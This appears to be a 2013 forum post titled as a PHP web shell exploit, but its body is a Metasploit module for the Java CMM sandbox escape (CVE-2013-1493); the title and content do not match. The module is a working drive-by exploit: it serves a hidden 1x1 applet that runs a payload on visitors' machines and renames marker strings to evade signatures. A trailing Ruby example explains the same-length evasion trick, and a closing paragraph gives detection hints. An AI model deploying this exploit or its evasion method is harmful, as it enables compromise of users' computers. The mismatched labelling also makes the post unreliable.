STUNSHELL PHP Web Shell Remote Code Execution

Posted by the original poster on 2013-4-4 17:31:17
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserAutopwn
  autopwn_info({ :javascript => false })

  def initialize( info = {} )
    super( update_info( info,
      'Name'           => 'Java CMM Remote Code Execution',
      'Description'    => %q{
        This module abuses the Color Management classes from a Java Applet to run
        arbitrary Java code outside of the sandbox as exploited in the wild in February
        and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
        and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
        systems. This exploit doesn't bypass click-to-play, so the user must accept the java
        warning in order to run the malicious applet.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown',     # Vulnerability discovery and Exploit
          'juan vazquez' # Metasploit module (just ported the published exploit)
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1493' ],
          [ 'OSVDB', '90737' ],
          [ 'BID', '58238' ],
          [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
          [ 'URL', 'http://pastie.org/pastes/6581034' ]
        ],
      'Platform'       => [ 'win', 'java' ],
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => 'java',
              'Arch'     => ARCH_JAVA
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch'     => ARCH_X86
            }
          ]
        ],
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 01 2013'
    ))
  end

  # Load the precompiled exploit classes shipped with the framework and
  # randomise the name of the applet's entry class so the served applet
  # does not carry a fixed, signature-friendly class name.
  def setup
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Init.class")
    @init_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Leak.class")
    @leak_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyBufferedImage.class")
    @buffered_image_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyColorSpace.class")
    @color_space_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    # Same-length replacement: the class file's constant pool is length-prefixed.
    @init_class_name = rand_text_alpha("Init".length)
    @init_class.gsub!("Init", @init_class_name)

    super
  end

  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      # Bundle the payload JAR with the exploit classes.
      jar = payload.encoded_jar
      jar.add_file("#{@init_class_name}.class", @init_class)
      jar.add_file("Leak.class", @leak_class)
      jar.add_file("MyBufferedImage.class", @buffered_image_class)
      jar.add_file("MyColorSpace.class", @color_space_class)

      # Rewrite the well-known "metasploit"/"Payload" markers in entry names
      # and bytes with random strings of identical length.
      metasploit_str = rand_text_alpha("metasploit".length)
      payload_str = rand_text_alpha("payload".length)
      jar.entries.each { |entry|
        entry.name.gsub!("metasploit", metasploit_str)
        entry.name.gsub!("Payload", payload_str)
        entry.data = entry.data.gsub("metasploit", metasploit_str)
        entry.data = entry.data.gsub("Payload", payload_str)
      }
      jar.build_manifest

      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      payload = regenerate_payload(cli)
      if not payload
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end
  end

  # Landing page: a 1x1 applet whose archive name is random per request.
  def generate_html
    html  = %Q|<html><head><title>Loading, Please Wait...</title></head>|
    html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
    html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@init_class_name}.class" width="1" height="1">|
    html += %Q|</applet></body></html>|
    return html
  end

end
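The module above rewrites the strings "metasploit" and "Payload" inside the JAR's class files with `rand_text_alpha("metasploit".length)`, that is, with replacements of exactly the same length. That constraint is not cosmetic: a Java class file stores every string as a length-prefixed CONSTANT_Utf8 entry in its constant pool, so a blind byte substitution that changes the length leaves the prefix pointing at the wrong number of bytes and the JVM rejects the class. The following Ruby is an added example, not part of the forum post or of the Metasploit module: it builds a small, constructed class-file prefix, walks the constant pool, and shows that a same-length rename still parses while a shorter one corrupts the pool. The helper names (`build_class_prefix`, `utf8_strings`, `rename_in_class`, `parses?`) and the sample strings are assumptions made for this illustration.

```ruby
# Added example: why the module's marker rewrite must preserve string length.
# Not part of the original post or of the Metasploit module; the class-file
# fragment below is constructed here for illustration.

# Payload sizes (bytes after the tag) of fixed-width constant-pool entries.
# Tag 1 (CONSTANT_Utf8) is variable-length and handled separately.
CP_FIXED = {
  3 => 4, 4 => 4, 5 => 8, 6 => 8, 7 => 2, 8 => 2, 9 => 4, 10 => 4,
  11 => 4, 12 => 4, 15 => 3, 16 => 2, 17 => 4, 18 => 4, 19 => 2, 20 => 2
}.freeze

# Build a minimal class-file prefix: magic, version 51 (Java 7), and a
# constant pool holding the given Utf8 strings plus one Class entry that
# refers to constant #1. Enough structure for the pool walker below.
def build_class_prefix(strings)
  pool = strings.map { |s| [1, s.bytesize].pack('Cn') + s.b }
  pool << [7, 1].pack('Cn')
  [0xCAFEBABE, 0, 51].pack('Nnn') + [pool.size + 1].pack('n') + pool.join
end

# Walk the constant pool and return every CONSTANT_Utf8 string.
# Raises ArgumentError when an entry runs past the data or an unknown tag
# is met, which is exactly what a length-changing rewrite produces.
def utf8_strings(data)
  raise ArgumentError, 'bad magic' unless data.byteslice(0, 4) == "\xCA\xFE\xBA\xBE".b
  count = data.byteslice(8, 2).unpack1('n')
  pos = 10
  out = []
  i = 1
  while i < count
    tag = data.getbyte(pos)
    raise ArgumentError, "truncated pool at #{pos}" if tag.nil?
    if tag == 1
      len = data.byteslice(pos + 1, 2).unpack1('n')
      s = data.byteslice(pos + 3, len)
      raise ArgumentError, "utf8 entry at #{pos} overruns data" if s.nil? || s.bytesize != len
      out << s
      pos += 3 + len
    else
      size = CP_FIXED[tag]
      raise ArgumentError, "unknown constant-pool tag #{tag} at #{pos}" unless size
      pos += 1 + size
    end
    # Long and Double occupy two pool slots.
    i += (tag == 5 || tag == 6) ? 2 : 1
  end
  out
end

# The module's trick, with the precondition made explicit: replace a marker
# everywhere in the raw bytes, which is only valid when the replacement has
# the same byte length as the original.
def rename_in_class(data, from, to)
  unless from.bytesize == to.bytesize
    raise ArgumentError, "#{from.inspect} and #{to.inspect} differ in length"
  end
  data.gsub(from.b, to.b)
end

# true if the constant pool still walks cleanly, false otherwise.
def parses?(data)
  utf8_strings(data)
  true
rescue ArgumentError
  false
end

# Constructed sample: one string carrying both markers, one ordinary descriptor.
SAMPLE = build_class_prefix(['metasploit/Payload', 'Ljava/lang/Object;'])

if __FILE__ == $0
  same_len = rename_in_class(SAMPLE, 'metasploit', 'abcdefghij')
  puts "same-length rename parses: #{parses?(same_len)}"
  puts "blind shorter rename parses: #{parses?(SAMPLE.gsub('metasploit'.b, 'msf'.b))}"
end
```

The same reasoning applies to the `Init` rename in `setup`: `rand_text_alpha("Init".length)` keeps the class name four bytes long, so the Utf8 entries naming the class stay consistent. A defender looking at a served JAR should therefore not expect the literal strings "metasploit" or "Payload" to be present, but can still look for the unrenamed helper classes `Leak.class`, `MyBufferedImage.class` and `MyColorSpace.class`, which the module adds under fixed names.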